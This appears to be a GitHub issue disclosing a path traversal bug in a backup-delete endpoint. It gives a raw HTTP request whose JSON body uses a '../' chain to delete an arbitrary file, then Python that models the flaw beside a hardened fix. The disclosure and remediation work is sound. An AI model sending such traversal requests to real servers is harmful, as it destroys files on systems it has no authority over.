Open f4nz4i opened 7 months ago
There is a security issue in your code. This security flaw can delete arbitrary system files.
Here is the example.
Here I first created a delete.txt file and then deleted the file through this vulnerability.
And the HTTP data is:

```http
POST /backup/deleteBackup HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=UTF-8
Content-Length: 44
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/backup/index
Cookie: org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=zh-CN; JSESSIONID=559259c4-c298-4fa4-86e3-282d013fcb1d
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

["../../../../../../../../../../delete.txt"]
```
The following is the vulnerability trigger point, which does not validate or filter the user-supplied input.
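The handler behind `/backup/deleteBackup` is not shown on this page, so the following is an added example written for this issue, not the reporter's code or the project's: a minimal model of the reported bug (join the user-supplied name onto the backup directory and unlink whatever that resolves to) beside a hardened form that resolves both paths and requires the target to be a direct child of the backup directory, which also catches absolute names and symlinks pointing out of it. The function names, the on-disk layout built under a temporary directory, and the choice of Python rather than the project's own language are assumptions; the traversal string in `demo()` uses just enough `../` to leave the constructed backup directory, where the report's ten would clamp at the filesystem root.

```python
"""Added example (not the project's code): the traversal the issue reports,
beside a hardened version of the delete handler. Handler names and the
on-disk layout are assumptions; the endpoint's real code is not shown."""
import os
import tempfile
from pathlib import Path


def delete_backup_unsafe(backup_dir: str, names: list[str]) -> list[str]:
    """Models the reported bug: joins the user-supplied name onto the backup
    directory and unlinks whatever that resolves to, so '../' escapes."""
    deleted = []
    for name in names:
        target = os.path.join(backup_dir, name)
        if os.path.isfile(target):
            os.remove(target)
            deleted.append(target)
    return deleted


def delete_backup_safe(backup_dir: str, names: list[str]) -> list[str]:
    """Hardened form: resolve the backup directory and the candidate with
    symlinks followed, then require the candidate to be a direct child of the
    backup directory. Traversal, absolute paths, nested paths and symlinks that
    point elsewhere are all rejected before anything is touched on disk."""
    root = Path(backup_dir).resolve(strict=True)
    deleted = []
    for name in names:
        # A backup name is a single path component; reject separators outright.
        if not name or name in (".", "..") or "/" in name or "\\" in name or "\0" in name:
            raise ValueError(f"rejected backup name: {name!r}")
        candidate = (root / name).resolve()
        if candidate.parent != root:
            raise ValueError(f"rejected backup name: {name!r}")
        if candidate.is_file():
            candidate.unlink()
            deleted.append(str(candidate))
    return deleted


def demo() -> dict:
    """Builds a constructed layout under a temp dir and runs both handlers.
    Layout (constructed): <tmp>/app/backups/ is the backup directory and
    <tmp>/delete.txt plays the 'system file' outside it."""
    tmp = Path(tempfile.mkdtemp())
    backups = tmp / "app" / "backups"
    backups.mkdir(parents=True)
    outside = tmp / "delete.txt"
    outside.write_text("victim")
    good = backups / "good.bak"
    good.write_text("backup")
    expected_good = str(good.resolve())
    traversal = "../../delete.txt"  # two levels up from <tmp>/app/backups

    result = {}
    # 1. The unsafe handler removes the file outside the backup directory.
    delete_backup_unsafe(str(backups), [traversal])
    result["unsafe_deleted_outside"] = not outside.exists()

    # 2. The hardened handler refuses the same name and leaves the file alone.
    outside.write_text("victim")
    try:
        delete_backup_safe(str(backups), [traversal])
        result["safe_rejected_traversal"] = False
    except ValueError:
        result["safe_rejected_traversal"] = True
    result["outside_survives"] = outside.exists()

    # 3. A symlink inside the directory that points outside is also refused,
    #    because the check runs on the resolved target, not the name.
    (backups / "link.bak").symlink_to(outside)
    try:
        delete_backup_safe(str(backups), ["link.bak"])
        result["safe_rejected_symlink"] = False
    except ValueError:
        result["safe_rejected_symlink"] = True

    # 4. A legitimate backup name inside the directory is still deleted.
    result["safe_deleted_in_dir"] = (
        delete_backup_safe(str(backups), ["good.bak"]) == [expected_good]
    )
    return result


if __name__ == "__main__":
    print(demo())
```

The check compares `candidate.parent` against the resolved root rather than doing a string prefix test, because a prefix test accepts sibling directories such as `backups-old/` and, without `resolve()`, is blind to symlinks.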